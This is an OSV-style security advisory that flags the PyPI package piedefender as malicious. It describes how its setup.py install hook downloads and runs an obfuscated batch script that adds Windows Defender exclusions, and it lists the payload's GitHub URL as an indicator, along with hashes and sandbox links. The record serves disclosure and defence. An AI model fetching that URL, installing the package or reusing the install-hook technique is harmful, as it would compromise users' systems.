{"id":"MAL-2025-3454","summary":"Malicious code in piedefender (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: kam193 (f8a30e991bd97073c50a9cdabb10842f2c5ae074c46fcd0aeff5d7917d4b56fa)\nsetup.py is prepared to download and run an obfuscated batch script. While the script is not detected by any AV currently, in the sandbox analysis it reveals behaviour like adding exclusions to Windows Defender\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2025-02-pydefender\n\n\nReasons (based on the campaign):\n\n\n - Downloads and executes a remote malicious script.\n\n\n - malware\n\n\n - The package overrides the install command in setup.py to execute malicious code during installation.\n","modified":"2026-03-19T12:55:21.819925Z","published":"2025-03-01T15:16:30Z","database_specific":{"iocs":{"urls":["https://raw.githubusercontent.com/baledreamer/payload/refs/heads/main/smegma.bat"]},"malicious-packages-origins":[{"sha256":"b13c9da5083fadd88be010b9dd1c0f2e3cb5cec7f1ff9a33d8f5f824c3182e1e","versions":["0.0.1"],"id":"RLMA-2025-02517","import_time":"2025-04-25T09:36:47.086298036Z","source":"reversing-labs","modified_time":"2025-04-23T16:06:31Z"},{"ranges":[{"events":[{"introduced":"0"}],"type":"ECOSYSTEM"}],"id":"pypi/2025-02-pydefender/piedefender","import_time":"2025-12-02T22:30:55.427439345Z","source":"kam193","modified_time":"2025-03-01T15:16:30Z","sha256":"2c1529cc05836ad53ce1822ee0e8da4790aa1ce9d219d1b00e70ced2cb8798fe"},{"ranges":[{"events":[{"introduced":"0"}],"type":"ECOSYSTEM"}],"id":"pypi/2025-02-pydefender/piedefender","import_time":"2025-12-02T23:07:18.453273245Z","source":"kam193","modified_time":"2025-03-01T15:16:30Z","sha256":"f8a30e991bd97073c50a9cdabb10842f2c5ae074c46fcd0aeff5d7917d4b56fa"},{"sha256":"2903ec35712e2f200e617905786798d33c5fde00c0334c5694257c81e6b9f066","versions":["0.0.1"],"id":"pypi/2025-02-pydefender/piedefender","import_time":"2025-12-10T21:38:57.668560408Z","source":"kam193","modified_time":"2025-03-01T15:16:30Z"},{"sha256":"9eac6fdd9b544e93e1b48694e0ffad9d309d5a7d03f1c87eb4b806af6e9e2141","id":"RLUA-2026-00591","import_time":"2026-03-19T12:20:12.093951523Z","source":"reversing-labs","modified_time":"2026-03-18T12:16:55Z"}]},"references":[{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/0877653f6a24639bb02b547c94f670597c3c0cd96df910a2ac891eaeaa9cc5f3/behavior"},{"type":"EVIDENCE","url":"https://tria.ge/250301-sdh1pstrz7/behavioral1"},{"type":"EVIDENCE","url":"https://app.any.run/tasks/0fbdb4f9-0497-4272-baf0-872e8d6e50bc"},{"type":"WEB","url":"https://bad-packages.kam193.eu/pypi/package/piedefender"}],"affected":[{"package":{"name":"piedefender","ecosystem":"PyPI","purl":"pkg:pypi/piedefender"},"versions":["0.0.1"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/piedefender/MAL-2025-3454.json"}}],"schema_version":"1.7.5","credits":[{"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"]},{"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"],"type":"REPORTER"},{"name":"ReversingLabs","contact":["https://www.reversinglabs.com"],"type":"FINDER"}]}